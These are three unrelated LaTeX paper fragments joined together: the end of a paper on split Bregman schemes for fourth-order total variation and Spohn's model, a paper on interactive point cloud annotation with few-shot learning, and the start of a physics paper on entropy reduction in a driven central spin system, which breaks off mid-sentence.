In this paper, we always suppose that $p=3$. Note that the approximation \eqref{Eq:2D_singular_approx} implies
\begin{equation}
|(\textbf{d}_{xy}^{k+1})_n| \approx |(\textbf{d}_x^{k+1})_n|\cdot\dfrac{s_n^k}{|s_{x,n}^k|}\quad\mbox{ and }\quad|(\textbf{d}_{xy}^{k+1})_n| \approx |(\textbf{d}_y^{k+1})_n|\cdot\dfrac{s_n^k}{|s_{y,n}^k|}.
\end{equation}
We obtain approximated Euler-Lagrange equations
\begin{subequations}
\begin{align}
\beta\dfrac{(\textbf{d}_x^{k+1})_n}{|(\textbf{d}_{x}^{k+1})_n|}\cdot\dfrac{|s_{x,n}^k|}{s_n^k}+(\textbf{d}_x^{k+1})_n|(\textbf{d}_x^{k+1})_n|\cdot\dfrac{s_n^k}{|s_{x,n}^k|}+\mu h_xh_y((\textbf{d}_x^{k+1})_n-s_{x,n}^k)=0,\label{Eq:Spohn_ite_dx}\\
\beta\dfrac{(\textbf{d}_y^{k+1})_n}{|(\textbf{d}_{y}^{k+1})_n|}\cdot\dfrac{|s_{y,n}^k|}{s_n^k}+(\textbf{d}_y^{k+1})_n |(\textbf{d}_y^{k+1})_n|\cdot\dfrac{s_n^k}{|s_{y,n}^k|}+\mu h_xh_y((\textbf{d}_y^{k+1})_n-s_{y,n}^k)=0\label{Eq:Spohn_ite_dy}.
\end{align}
\end{subequations}
In a similar way to the one dimensional case, we obtain the shrinkage operators of the form
\begin{subequations}
\begin{align}
(\textbf{d}_x^{k+1})_n &= \dfrac{\mu h_xh_y|s_{x,n}^k|}{2s_n^k}\cdot\dfrac{s_{x,n}^k}{|s_{x,n}^k|}\left(-1+\sqrt{1+\dfrac{4s_n^k}{\mu h_xh_y|s_{x,n}^k|}\max\left\{|s_{x,n}^k|-\dfrac{\beta |s_{x,n}^k|}{\mu h_xh_ys_n^k},0\right\}}\right),\\
(\textbf{d}_y^{k+1})_n &= \dfrac{\mu h_xh_y|s_{y,n}^k|}{2s_n^k}\cdot\dfrac{s_{y,n}^k}{|s_{y,n}^k|}\left(-1+\sqrt{1+\dfrac{4s_n^k}{\mu h_xh_y|s_{y,n}^k|}\max\left\{|s_{y,n}^k|-\dfrac{\beta |s_{y,n}^k|}{\mu h_xh_ys_n^k},0\right\}}\right).
\end{align}
\end{subequations}
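For concreteness, the $x$-component shrinkage can be written down in a few lines of NumPy. This is an illustrative sketch, not the authors' code: it assumes `s` denotes the combined magnitude $s_n^k$ (positive) and `s_x` the component $s_{x,n}^k$ (nonzero), applied elementwise.

```python
import numpy as np

def shrink_x(s_x, s, beta, mu, hx, hy):
    """Shrinkage operator for the x-component (d_x^{k+1})_n.

    s_x : the component s_{x,n}^k (assumed nonzero)
    s   : the combined magnitude s_n^k (assumed positive)
    """
    a = mu * hx * hy * np.abs(s_x) / (2.0 * s)                          # prefactor
    inner = np.maximum(np.abs(s_x) - beta * np.abs(s_x) / (mu * hx * hy * s), 0.0)
    root = np.sqrt(1.0 + 4.0 * s / (mu * hx * hy * np.abs(s_x)) * inner)
    return a * np.sign(s_x) * (-1.0 + root)
```

For large $\beta$ the `max` term vanishes and the output is exactly zero, i.e., the operator shrinks small inputs to zero as a soft-thresholding rule should.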
Figure \ref{Fig:2D_Spohn} shows the numerical result of the split Bregman framework for Spohn's fourth order model. We use $p=3$, $\beta=0.25$, $N_x=N_y=40$, $\lambda=1.25h^{-4}$ and $\mu=5h^{-2}$. Moreover, we use the initial value $u^0(x,y) = x(x-1)y(y-1)-1/36$, which is considered in \cite{KV10}. Similar numerical results are obtained quite efficiently by the split Bregman framework.
\section{Conclusion}
In this study, we propose a new numerical scheme for the OSV model, fourth order total variation flow and Spohn's fourth order model. Our scheme is based on the split Bregman framework for the ROF model and second order total variation flow. We demonstrate several numerical examples for one dimensional and two dimensional problems under periodic boundary conditions. We use the parameters $\lambda=O(h^{-3})$, $\mu=O(h^{-1})$ for the one dimensional case, and $\lambda=O(h^{-4})$, $\mu=O(h^{-2})$ for the two dimensional case. For fourth order total variation flow, our numerical results approximately represent the flat facet and discontinuity, as expected from the theoretical result for the exact profile. Furthermore, we propose new shrinkage operators for Spohn's model. Numerical results for Spohn's model show faceting and relaxation.
\section*{Acknowledgement}
A part of the work of the second author was done when he was a postdoc fellow at the University of Tokyo. Its hospitality is gratefully acknowledged. The work of the first author was partly supported by the Japan Society for the Promotion of Science through the grant No. 26220702 (Kiban S), No. 19H00639 (Kiban A), No. 18H05323 (Kaitaku), No. 17H01091 (Kiban A) and No. 16H03948 (Kiban B).
\bibliographystyle{plain}
\section{Introduction}
\label{introduction}
Two dimensional images have been the most popular digital representation of the world; however, point cloud data is increasingly gaining center stage with applications in autonomous driving, robotics and augmented reality. While synthetic point cloud datasets have been around for some time \cite{shapenet2015}, the prevalence of depth cameras such as \cite{8014901} and \cite{Zhang:2012:MKS:2225053.2225203} has led to the creation of large 3D datasets \cite{Vladlen}, created by applying techniques from \cite{Newcombe} to depth scans. Finally, we have also seen a number of point cloud datasets created using LIDAR scans of outdoor environments such as \cite{hackel2017isprs}, \cite{Behley2019ADF}.
The intensity and geometric information in point clouds provide a more detailed digital description of the world than images but their value in algorithmic analysis is fully realised when the points have an associated semantic label. However, annotating 3D point clouds is a time-consuming and labour intensive process owing to the size of the datasets and the limitations of the 2D interfaces in manipulating 3D data.
The problem of providing a label for each point in a point cloud has been tackled via a host of fully automatic approaches in the domain of point cloud segmentation \cite{DBLP:journals/corr/abs-1710-07563} \cite{DBLP:journals/corr/abs-1711-09869}. While these approaches are successful in delineating large structures such as buildings, roads and vehicles, they perform poorly on finer details in the 3D models. Besides, most of these approaches use supervised learning methods which in turn rely on labelled datasets, making it a chicken-and-egg problem.
Thus, most existing datasets \cite{Behley2019ADF} \cite{hackel2017isprs} \cite{Roynard2018ParisLille3DAL} have been annotated via predominantly manual systems to ensure accuracy and to avoid algorithmic biases in the produced datasets. The large investment of human effort required to generate the annotations severely limits both the significance and prevalence of point cloud datasets that are available for the community.
Annotating large scale datasets is a natural use case for fusing human and algorithmic intelligence. Annotations inherently rely on a human definition and are also representative of semantic patterns that can be identified by an algorithm. Thus, we observe an active field of research which seeks to fuse human and algorithmic actors in one overarching framework to aid in annotating datasets. Most notable in the context of point cloud annotation is \cite{Yi:2016:SAF:2980179.2980238}, which proposes an active learning framework for region annotations in datasets with repeating shapes. However, this method is limited to annotating in certain 2D views of the point clouds. Our proposed framework allows for annotation in full 3D, thus allowing for finer annotation of the point cloud and the ability to work with less structured real-world point clouds as opposed to relatively noise-free synthetic point clouds.
\begin{figure*}[h]
\centering \includegraphics[width=\textwidth]{pipeline.png}
\caption{
\label{fig:pipeline}
This figure illustrates our pipeline. The first step starts with a partial sparse annotation by a human, followed by a region growing step using 3D geometric cues. We then iterate between few-shot learning using newly available annotations and sparse correction of predictions via human annotator to obtain final segmentation outputs.
}
\end{figure*}
In this work, we propose a human-in-the-loop learning approach that fuses together manual annotation and algorithmic propagation and capitalises on existing 3D datasets for improving semantic understanding. Our method starts with a partial sparse annotation by a human, followed by a region growing step using 3D geometric cues. We then iterate over the following steps: a) model fine-tuning using newly available annotations, b) model prediction on the point cloud to be annotated, and c) sparse correction of predictions by the human annotator. Figure \ref{fig:pipeline} gives a snapshot of our annotation approach.
In the next couple of sections we go over our methodology in more details followed by a discussion of our results and future work.
\section{Methodology}
\label{method}
This system is primarily focused on providing an annotation framework to create datasets of point clouds with ground truth semantic labels for each point. For a given point cloud, our method starts with sparse manual annotation and then iterates between two main steps: few-shot learning and manual correction. The manual annotations are provided by marking a few representative points for each part to be labelled in the point cloud. These labels are propagated across the point cloud using geometric cues, and the result is used to train the network. The final step involves correcting network mispredictions, which is used to further guide the training process. For the initial point clouds to be annotated, these steps are iterated over multiple times, but as more point clouds are annotated using this framework, the method converges to relying only on the initial set of manual annotations (or no annotations at all) to make more accurate annotation predictions.
\subsection{Manual Annotations and Region Growing}
The decomposition of a point cloud into semantically meaningful parts/regions is an open-ended problem as the concept of an annotation is context-dependent \cite{segmentation_eval}. Owing to this ambiguity, the first step of our annotation pipeline is to allow the user to determine the number of possible classes that exist in the segmentation of point clouds in the dataset. The framework of annotation, learning and correction also provides the flexibility to have a different number of segmentations for the same point cloud, allowing for creating datasets with varying granularities of segmentation as in \cite{DBLP:journals/corr/abs-1812-02713}. The user initially provides labels to a point or a small group of points for each of the classes in the point cloud. Thereafter, human-provided annotations are automatically propagated to a few unlabelled points by exploiting the geometry of the point cloud. We believe that relying on geometric attributes like surface normals, smoothness, curvature and color (if available) simplifies the goal of segmentation to decomposing the point cloud into locally smooth regions enclosed by sharp boundaries. These segmentations also often end up matching human perception and can be used as an initial training example for the learning pipeline. For this reason, we use cues like surface normals to group spatially close points as belonging to the same region. We also experimented with color-based region growing, as well as K-Nearest Neighbour (KNN) and Fixed Distance Neighbor (FDN) \cite{nearest_neighbor} based region growing methods, which end up being faster than surface-normal based region growing without compromising the accuracy of the overall system. Region growing approaches reduce the annotator's overhead of selecting multiple points by providing a geometry-aware selection mechanism.
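A conservative normal-based region growing step of the kind described above can be sketched as follows. This is a minimal illustration, not the tool's actual implementation: the k-d tree neighbour query, the value of `k` and the angle threshold are all assumptions.

```python
import numpy as np
from collections import deque
from scipy.spatial import cKDTree

def grow_region(points, normals, seed_idx, k=8, angle_thresh_deg=10.0):
    """Grow a region from a seed point over k-nearest neighbours,
    accepting a neighbour only if its surface normal is nearly parallel
    to the current point's normal (conservative threshold).

    points  : (N, 3) array of point positions
    normals : (N, 3) array of unit surface normals
    Returns the set of point indices assigned to the seed's region.
    """
    tree = cKDTree(points)
    cos_thresh = np.cos(np.deg2rad(angle_thresh_deg))
    region, frontier = {seed_idx}, deque([seed_idx])
    while frontier:
        i = frontier.popleft()
        _, neigh = tree.query(points[i], k=k)   # k nearest neighbours of point i
        for j in np.atleast_1d(neigh):
            # accept j if the normals are nearly parallel (up to orientation flips)
            if j not in region and abs(np.dot(normals[i], normals[j])) >= cos_thresh:
                region.add(j)
                frontier.append(j)
    return region
```

Because the threshold is applied between each frontier point and its neighbours, growth stops at sharp creases where normals change abruptly, which is exactly the conservative behaviour wanted for seeding the learner.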
\subsection{Few-shot Learning}
The goal of few-shot learning optimization in this context is to rely on minimal human supervision to improve segmentation accuracy. It is for this reason that we obtain the initial set of ground truth labels for training from manual annotations and use region growing methods for further supervision. We use very conservative thresholds for the region growing methods to avoid noisy ground truth labels. We also use a pre-trained network to bootstrap the training process and reduce the amount of human effort in correction phase.
The pre-trained network to be used in this system can be any segmentation network, pre-trained on an existing dataset in a similar domain. For our experiments, we used PointNet \cite{pointnet} pre-trained on ShapeNet \cite{DBLP:journals/corr/ChangFGHHLSSSSX15} to bootstrap the training.
We fine-tune the base network iteratively using limited supervision in the form of annotation and correction provided by the human in the loop. We also dynamically adapt the base network depending on the number of segmentation classes in the point cloud. The initial seed acquired from manual annotation and region growing gives a partially labelled point cloud that is used to fine-tune the base network. The model leverages the prior semantic understanding in the pre-trained network alongside the supervision of partially labelled points in the entire point cloud to provide meaningful segmentations in the first stage. We rely on the human annotators to compensate for network mispredictions by assigning new labels to points with incorrect segmentations. Subsequently, we fine-tune further with all the labels (initial seed + corrections) that the human annotator has provided so far. This process continues until all points are labelled correctly - as verified by the human annotator. At this stage, we retrain the network with all the points in the point cloud - which allows us to propagate these labels to newer point clouds of the same shape in the dataset. Figure \ref{fig:FineTuningExample} illustrates a sample of the results from this loop of user feedback and fine-tuning.
\begin{figure}[h]
\centering \includegraphics[width=0.9\columnwidth]{FineTune.png}
\caption{
\label{fig:FineTuningExample}
Figure to show effects of few-shot learning in 3 class segmentation of a chair. From left to right i) Manual annotation with region growing ii) Predictions of the network after fine tuning. Notice the spillage of labels at the boundary which is resolved after correction and final learning step iii) Partially corrected point cloud from the user iv) Final prediction after fine tuning with corrections
}
\end{figure}
\subsubsection{Smoothness Loss}
We formulate segmentation as a per-point classification problem similar to the setup of PointNet \cite{pointnet}, including global and local feature aggregation. We also use a transformation network to ensure that the network predictions are agnostic to rigid transformations of the point cloud. We further leverage the smoothness of the shape to favor regions that are compact and continuous. Overall, the network loss can be formulated as:
\begin{equation}
\mathcal{L} = L_{segment} + \alpha L_{transform} + \beta L_{smooth}
\end{equation}
We use \textit{smoothness loss} in addition to the segmentation cross entropy loss to encourage adjacent points to have similar labels. The smoothness loss is formulated as follows: \\
\begin{equation}
L_{smooth} = \sum_{i=1}^{N}\sum_{j=i}^{N}D_{KL} \left( p_i \middle\| p_j \right) e^{-\frac{\sqrt{\left\Vert (pos_{p_i} - pos_{p_j})\right\Vert_2^2}}{\sigma}}
\end{equation}
The smoothness term is computed as the pairwise \textit{Kullback-Leibler} (KL) divergence of predictions, exponentially weighted by the Euclidean distance between any two points in the point cloud. $\sigma$ is set to the variance of the pairwise distance between all points to capture the point cloud density in the loss term. The smoothness term in this context is expected to capture and minimize the relative entropy between neighboring points in the point cloud. This term ends up dominating the total loss if nearby points have divergent logits. Points which are far from each other contribute very little to the overall loss term, regardless of their logits, owing to the high pairwise distances between them.
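The smoothness term above can be written compactly with NumPy broadcasting. The sketch below is illustrative: it assumes per-point softmax probabilities are available, and the small epsilon for numerical stability is an implementation detail not specified in the text.

```python
import numpy as np

def smoothness_loss(probs, pos, eps=1e-12):
    """Pairwise KL-divergence smoothness term, weighted by spatial proximity.

    probs : (N, C) per-point class probabilities (rows sum to 1)
    pos   : (N, 3) point positions
    """
    # Euclidean distance between every pair of points
    diff = pos[:, None, :] - pos[None, :, :]
    dist = np.sqrt((diff ** 2).sum(-1))
    # sigma = variance of the pairwise distances, as in the text
    sigma = dist[np.triu_indices_from(dist, k=1)].var()
    # KL(p_i || p_j) for all pairs, with an epsilon for numerical stability
    logp = np.log(probs + eps)
    kl = (probs[:, None, :] * (logp[:, None, :] - logp[None, :, :])).sum(-1)
    weight = np.exp(-dist / sigma)
    iu = np.triu_indices(len(pos))   # j >= i, matching the paper's double sum
    return (kl * weight)[iu].sum()
```

When all points carry identical predictions the KL divergence vanishes pairwise and the loss is exactly zero; divergent predictions on nearby points dominate the sum, as described above.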
Figure \ref{fig:SmoothnessLossExample} shows a qualitative example for the effect of the smoothness loss.
\begin{figure}[h]
\centering \includegraphics[width=0.8\columnwidth]{SmoothnessLoss.png}
\caption{
\label{fig:SmoothnessLossExample}
Illustration to show effect of the smoothness loss. From left to right i) Manual annotation with region growing ii) Predictions of the network without smoothness loss iii) Network predictions with smoothness loss
}
\end{figure}
As observed in our experiments, the first-stage segmentation output requires less human cognitive effort to correct when the smoothness term is added to the loss computation. The weight of the smoothness loss term is subsequently dropped after getting further supervision from the user.
\section{Results}
\label{results}
In this section, we discuss the experimental setup to validate the effectiveness of our framework by investigating its utility in creating new datasets compared to completely manual or semi-automatic methods. Additionally, we investigate the improvement in annotation efficiency as the total number of annotated point clouds increases.
\textbf{Dataset}. To test the robustness of our framework and the ease of adapting to it, we aim to use it to create a massive and diverse dataset of synthetic and reconstructed point clouds. Towards this goal, we have created part segmentations of reconstructed point clouds taken from A Large Dataset of Object Scans \cite{Vladlen}. Qualitative results for segmentations are shown in Figure \ref{fig:VladenDataset}. The framework showed a remarkable improvement in human annotation efficiency, as measured by the number of clicks required for manual annotation and correction, which is discussed in subsequent parts of this section.
\begin{figure}[h]
\centering \includegraphics[width=0.8\columnwidth]{new_dataset.png}
\caption{
\label{fig:VladenDataset}
Qualitative results for part segmentation on reconstructed point clouds from Large Dataset of Object Scans \cite{Vladlen}. The results are shown for segmentation of noisy shapes in potted plant and chair class into two and three classes respectively using our framework.
}
\end{figure}
\textbf{Granularity}. The framework also provides the flexibility to annotate with different number of classes for the same shape. The user selects sparse points for each of the classes in the first stage and this information is dynamically incorporated in the training process by re-initializing the last layer to accommodate different number of classes. Qualitative segmentation outputs are illustrated in Figure \ref{fig:chair}.
\begin{figure}[h]
\centering \includegraphics[width=0.8\columnwidth]{chair.png}
\caption{
\label{fig:chair}
Qualitative results for part segmentation on the same shape with different granularities.
}
\end{figure}
\subsection{Annotation Efficiency Improvements}
Existing semi-supervised methods \cite{Yi:2016:SAF:2980179.2980238} use the amount of supervision and accuracy as evaluation metrics to measure performance. We follow suit and compare the amount of supervision needed to completely annotate a point cloud in our framework as opposed to completely manual methods. In Table \ref{table1} we compare the number of clicks required by the annotator in our framework to a naive nearest-neighbour-painting based manual approach.
\begin{table}
\caption{Average number of clicks taken to annotate point clouds with varying granularities in terms of number of parts for the same shape. We notice a significant reduction in number of clicks in comparison to manual methods and even our method without the smoothness constraint.}
\label{table1}
\includegraphics[width=\linewidth]{table.png}
\end{table}
With subsequent complete annotations of point clouds coming from the same dataset, we expect a reduction in the human supervision needed in order to have a scalable system. As we incrementally train the network on a progressively complete annotation of the point clouds, the model adapts to the properties of the new domain represented by the dataset. Thus, we are able to predict a more accurate segmentation of the point cloud in the initial iterations thereby cutting down on the total number of user correction steps needed. This is validated via our experiments as illustrated in Figure \ref{fig:MulitplePointClouds}.
\begin{figure}[h]
\centering \includegraphics[width=0.8\columnwidth]{graph.png}
\caption{
\label{fig:MulitplePointClouds}
Number of clicks taken to annotate subsequent point clouds using our framework. We see a reduction in number of clicks needed as more point clouds of the new dataset are annotated.
}
\end{figure}
While previous works measure the amount of user supervision based on invested time, we focused on quantifying supervision via the number of clicks. Through our experiments we observed that the time taken to annotate a point cloud reduces with the number of point clouds annotated, even in completely manual methods. This is because a large part of the time taken in annotating goes into manipulating the point clouds on a 2D tool. As the annotators label more point clouds, they get more accustomed to the tool and the relevant manipulation interactions, reducing the overall time they need in annotating subsequent point clouds. On the other hand, the number of clicks needed depends more on the complexity of the point cloud and the number of classes to be annotated than on the number of point clouds previously annotated in the system, making it a more suitable metric for evaluation.
\section{Conclusion}
We provide a scalable interactive learning framework that can be used to annotate large point cloud datasets. By fusing together three different cues (human annotations, learnt semantic similarity and geometric consistencies) we are able to obtain accurate annotations with fewer human interactions. We note that while the number of clicks is a useful proxy for the quantum of human interaction needed, it is also important to study the amount of time needed for each click as it adds to the overall human time investment needed in annotating a dataset. Significant leaps in reducing the cognitive overload for a human annotator can be made by replacing 2D user interfaces with spatial user interfaces facilitated via virtual reality systems, as they make point cloud manipulation and visualization more natural for the annotator.
\section*{Abstract}
{\bf
Non-equilibrium physics is a particularly fascinating field of
current research. Generically, driven systems are gradually heated up
so that quantum effects die out. In contrast, we show that
a driven central spin model including
controlled dissipation in a highly excited state allows us
to distill quantum coherent states, indicated by a substantial
reduction of entropy; the key resource is the commensurability
between the periodicity of the pump pulses and the internal processes.
The model is experimentally accessible
in purified quantum dots or molecules with unpaired electrons.
The potential of preparing and manipulating coherent states
by designed driving potentials is pointed out.
}
\vspace{10pt}
\noindent\rule{\textwidth}{1pt}
\tableofcontents\thispagestyle{fancy}
\noindent\rule{\textwidth}{1pt}
\vspace{10pt}
\section{Introduction}
\label{sec:introduction}
Controlling a quantum mechanical system in a coherent way is one of
the long-standing goals in physics. Obviously, coherent control is
a major ingredient for handling quantum information. In parallel,
non-equilibrium physics of quantum systems
is continuing to attract significant interest.
A key issue in this field is to manipulate systems in time
such that their properties can be tuned and changed
at will. Ideally, they display properties qualitatively different from
what can be observed in equilibrium systems.
These current developments illustrate the interest in
understanding the dynamics induced by time-dependent Hamiltonians
$H(t)$.
The unitary time evolution operator $U(t_2,t_1)$ induced by $H(t)$
is formally given by
\begin{equation}
U(t_2,t_1) = {\cal T}\exp\left(-i\int_{t_1}^{t_2}H(t)dt\right)
\end{equation}
where ${\cal T}$ is the time ordering operator. While the explicit
calculation of $U(t_2,t_1)$ can be extremely difficult it is obvious
that the dynamics induced by a time-dependent Hamiltonian
maps quantum states at $t_1$ to quantum states at $t_2$
bijectively and conserves the mutual scalar products. Hence, if initially
the system is in a mixed state with high entropy $S>0$ it stays in a
mixed state for ever with exactly the same entropy.
No coherence can be generated in this way even for a
complete and ideal control of $H(t)$ in time.
Hence, one has to consider open systems.
The standard way to generate a single state is to bring the system of interest
into thermal contact with a cold system. Generically,
this is an extremely slow process. The targeted quantum states
have to be ground states of some given system.
Alternatively, optical pumping in general and laser cooling in particular \cite{phill98} are well
established techniques to lower the entropy of microscopic systems
using resonant pumping and spontaneous decay. Quite recently, engineered
dissipation has been recognized as a means to generate
targeted entangled quantum states in small \red{\cite{witth08,verst09,vollb11}}
and extended systems \cite{kraus08,diehl08}. Experimentally, entanglement
has been shown for two quantum bits
\cite{lin13,shank13} and for two trapped mesoscopic cesium clouds \cite{kraut11}.
In this article, we show that periodic driving can have a quantum
system converge to coherent quantum states if an intermediate, highly
excited and decaying state is involved. The key aspect is
the commensurability of the \red{period of the pump pulses to the
time constants of the internal processes, here Larmor precessions}.
This distinguishes our proposal from established optical pumping
protocols. The completely disordered initial mixture can
be made almost coherent. The final mixture only
has an entropy $S\approx k_\text{B}\ln2$ corresponding to a mixture of
two states.
An appealing asset is that once the driving is switched off
the Lindbladian decay does not matter anymore
and the system is governed by Hamiltonian dynamics only.
The focus of the present work
is to exemplarily demonstrate the substantial reduction of entropy in
a small spin system
subject to periodic laser pulses. The choice of system is motivated
by experiments on the electronic spin in quantum dots interacting with
nuclear spins
\cite{greil06a,greil07b,petro12,econo14,beuge16,jasch17,scher18,klein18}.
The model studied is also applicable
to the electronic spin in molecular radicals \cite{bunce87}
or to molecular magnets, see Refs.\ \cite{blund07,ferra17,schna19}.
In organic molecules the spin
bath is given by the nuclear spins of the hydrogen nuclei
in organic ligands.
\section{Model}
\label{sec:model}
The model comprises a central, electronic spin $S=1/2$ which is
coupled to nuclear spins
\begin{equation}
\label{eq:hamil_spin}
H_\text{spin} = H_\text{CS} + H_\text{eZ} + H_\text{nZ}
\end{equation}
where $H_\text{eZ}=h S^x$ is the electronic Zeeman term with
$h=g\mu_\text{B} B$ ($\hbar$ is set to unity
\red{here and henceforth) with the gyromagnetic factor
$g$, the Bohr magneton $\mu_\text{B}$,
the external magnetic field $B$ in $x$-direction and the $x$-component $S^x$
of the central spin. The nuclear Zeeman term is given by
$H_\text{nZ} = z h \sum_{i=1}^N I^x_i$
where $z$ is the ratio of the nuclear $g$-factor multiplied by
the nuclear magneton and their electronic counterparts
$g_\text{nuclear}\mu_\text{nuclear}/(g\mu_\text{B})$.
The operator $I^x_i$ is the $x$-component of the nuclear spin $i$.
For simplicity we take $I=1/2$ for all nuclear spins.}
Due to the large nuclear mass, the factor $z$ is of the
order of $10^{-3}$, but in principle other $z$-values can be studied as well,
\red{see also below}.
In the central spin part $H_\text{CS}=\vec{S}\cdot\vec{A}$ the
\red{so-called Overhauser field $\vec{A}$ results from
the combined effect of all nuclear spins each of which is
interacting via the hyperfine coupling $J_i$ with} the central spin
\begin{equation}
\vec{A} = \sum_{i=1}^N J_i \vec{I}_i.
\end{equation}
\red{If the central spin results from an electron the
hyperfine coupling is a contact interaction at the location
of the nucleus stemming from relativistic corrections to the
non-relativistic Schr\"odinger equation with a Coulomb potential.
It is proportional to the
probability of the electron to be at the nucleus, i.e., to the
modulus squared of the electronic wave function \cite{schli03,coish04}. Depending on
the positions of the nuclei and on the shape of the wave function
various distributions of the $J_i$ are plausible. A
Gaussian wave function in one dimension implies
a parametrization by a Gaussian while in two dimensions
an exponential parametrization is appropriate \cite{farib13a,fause17a}.
We will first use a uniform distribution for simplicity
and consider the Gaussian and exponential case afterwards.}
Besides the spin system there is an important intermediate state
given by a single trion state $\ket{\mathrm{T}}$ \red{consisting of the
single fermion providing the central spin bound to an
additional exciton. This trion is polarised in $z$-direction
at the very high energy $\varepsilon$ ($\approx 1$ eV).
The other polarisation exists as well, but using circularly
polarised light it is not excited. A Larmor precession of
the trion is not considered here for simplicity.
Then,} the total Hamiltonian reads
\begin{equation}
H = H_\text{spin} + \varepsilon \ket{\mathrm{T}}\bra{\mathrm{T}}.
\end{equation}
The laser pulse is taken to be very short as in experiment
where its duration $\tau$ is of the order of picoseconds. Hence, we
describe \red{its effect by a unitary time evolution operator
$\exp(-i\tau H_\text{puls})=U_\text{puls}$} which excites the $\ket{\uparrow}$
state of the central spin to the trion state or de-excites it
\begin{equation}
\label{eq:puls}
U_\text{puls} = c^\dag + c +\ket{\downarrow} \bra{\downarrow}.
\end{equation}
where $c:=\ket{\uparrow}\bra{\mathrm{T}}$ and
$c^\dagger:=\ket{\mathrm{T}}\bra{\uparrow}$.
\red{This unitary operator happens to be hermitian as well, but this
is not an important feature.
One easily verifies $U_\text{puls}U_\text{puls}^\dag=\mathbb{1}$.}
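This identity is also easily checked numerically; the snippet below is an illustration in the three-level basis $(\ket{\downarrow},\ket{\uparrow},\ket{\mathrm{T}})$, not part of the model definition.

```python
import numpy as np

# basis vectors (|down>, |up>, |T>) as rows of the identity
down, up, T = np.eye(3)

# U_puls = c^dag + c + |down><down|, with c = |up><T|
U = np.outer(T, up) + np.outer(up, T) + np.outer(down, down)

# the pulse operator is unitary (and happens to be hermitian as well)
print(np.allclose(U @ U.conj().T, np.eye(3)))   # True
```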
Such pulses are applied in long periodic trains lasting seconds and minutes.
The repetition time between two consecutive pulses is ${T_\mathrm{rep}}$ of the
order of 10 ns.
The decay of the trion is described by the Lindblad equation
for the density matrix $\rho$
\begin{equation}
\label{eq:lind}
\partial_t \rho(t) = -i[H,\rho] - \gamma (c^\dag c\rho + \rho c^\dag c- 2c\rho c^\dag)
\end{equation}
where the prefactor $\gamma>0$ of the dissipator term \cite{breue06}
defines the decay rate. The corresponding process with $c$ and $c^\dag$
swapped needs not be included because its decay rate is smaller
by $\exp(-\beta\varepsilon)$, i.e., it vanishes for all physical purposes.
\red{We emphasize that we deal with an open quantum system by virtue of
the Lindblad dynamics in \eqref{eq:lind}.
Since the decay of the trion generically implies the emission of
a photon at high energies
the preconditions for using Lindblad dynamics are perfectly met \cite{breue06}.}
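The right-hand side of the Lindblad equation above is straightforward to evaluate numerically. The sketch below sets up a toy three-level system (spin down, spin up, trion) with arbitrarily chosen $h$ and $\varepsilon$; it is an illustration of the structure of the dissipator, not the production code used for the results.

```python
import numpy as np

def lindblad_rhs(rho, H, c, gamma):
    """Right-hand side of the Lindblad equation:
    drho/dt = -i[H, rho] - gamma*(c^dag c rho + rho c^dag c - 2 c rho c^dag)."""
    cd = c.conj().T
    return (-1j * (H @ rho - rho @ H)
            - gamma * (cd @ c @ rho + rho @ cd @ c - 2.0 * c @ rho @ cd))

# toy three-level system in the basis (|down>, |up>, |T>)
down, up, T = np.eye(3)
c = np.outer(up, T)                           # c = |up><T|: the trion decays to |up>
H = np.zeros((3, 3), dtype=complex)
H[:2, :2] = 0.5 * np.array([[0, 1], [1, 0]])  # h S^x in the spin sector, h = 1
H[2, 2] = 1.0e3                               # trion energy epsilon >> h (arbitrary units)
```

One can check directly that the dissipator transfers population from the trion to the spin-up state at rate $2\gamma$ while the trace of $\rho$ is conserved, as it must be for a Lindblad evolution.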
\section{Mathematical Properties of Time Evolution}
\label{sec:math-proper}
The key observation is that the dynamics from just before the $n$th pulse
at $t=n{T_\mathrm{rep}} -$ to just before the $n+1$st pulse at $t=(n+1){T_\mathrm{rep}} -$
is a \emph{linear} mapping $M: \rho(n{T_\mathrm{rep}}-) \rightarrow \rho((n+1){T_\mathrm{rep}}-)$ which
does not depend on $n$. Since it is
acting on operators one may call it a superoperator.
Its matrix form is derived explicitly in Appendix \ref{app:matrix}.
If no dissipation took place ($\gamma=0$) the
mapping $M$ would be unitary. But in presence of the dissipative trion decay
it is a general matrix with the following properties:
\begin{enumerate}
\item
The matrix $M$ has an eigenvalue $1$ which may be degenerate.
If the dynamics of the system takes place in $n$ separate
subspaces without transitions between them the degeneracy
is at least $n$.
\item
All eigenoperators to eigenvalues different from 1 are traceless.
\item
At least one eigenoperator to eigenvalue 1 has a finite trace.
\item
The absolute values of all eigenvalues of $M$ are not larger
than 1.
\item
If there is a non-real eigenvalue $\lambda$ with eigenoperator $C$,
the complex conjugate $\lambda^*$ is also an eigenvalue with eigenoperator
$C^\dag$.
\item
The eigenoperators to eigenvalues 1 can be scaled to be
hermitian.
\end{enumerate}
While the above properties can be shown rigorously, see Appendix \ref{app:properties},
for any Lindblad evolution,
the following ones are observed numerically in the analysis of the
particular model \eqref{eq:lind} under study here:
\begin{itemize}
\item[(a)]
The matrix $M$ is diagonalizable; it does not require a Jordan normal form.
\item[(b)]
For pairwise different couplings $i\ne j\Rightarrow J_i\ne J_j$ the
eigenvalue $1$ is non-degenerate.
\item[(c)]
The eigenoperators to eigenvalue 1 can be scaled to be hermitian and non-negative.
In the generic, non-degenerate case we denote the properly scaled eigenoperator
$V_0$ with $\text{Tr}(V_0)=1$.
\item[(d)]
No eigenvalue $\neq 1$, but with absolute value 1, occurs,
i.e., all eigenvalues different from 1 are smaller than 1 in absolute value.
\item[(e)]
Complex eigenvalues and complex eigenoperators do occur.
\end{itemize}
The above properties allow us to understand what happens in experiment
upon application of long trains of pulses corresponding
to $10^{10}$ and more applications of $M$. Then it is safe to conclude that all
contributions from eigenoperators to eigenvalues smaller than 1 have died out
completely. Only the (generically) single eigenoperator $V_0$ to eigenvalue 1
is left such that
\begin{equation}
\lim_{n\to\infty} \rho(n{T_\mathrm{rep}}-) = V_0.
\end{equation}
The quasi-stationary state after long trains of pulses is given by $V_0$
\footnote{We use the term `quasi-stationary' state
because it is stationary only if we detect it stroboscopically at the
time instants $t=n{T_\mathrm{rep}}-$.}.
This observation simplifies the calculation of the long-time limit
greatly compared to previous quantum mechanical studies
\cite{econo14,beuge16,beuge17,klein18}.
One has to compute the eigenoperator of $M$ to
the eigenvalue 1. Below this is performed by diagonalization of $M$ which
is a reliable approach, but restricted to small systems $N\lessapprox6$.
We stress that no complete diagonalization is required to know $V_0$
because only the eigenoperator to the eigenvalue 1 is needed.
Hence we are optimistic that further computational improvements are possible.
If, however, the speed of convergence is of interest more information on the
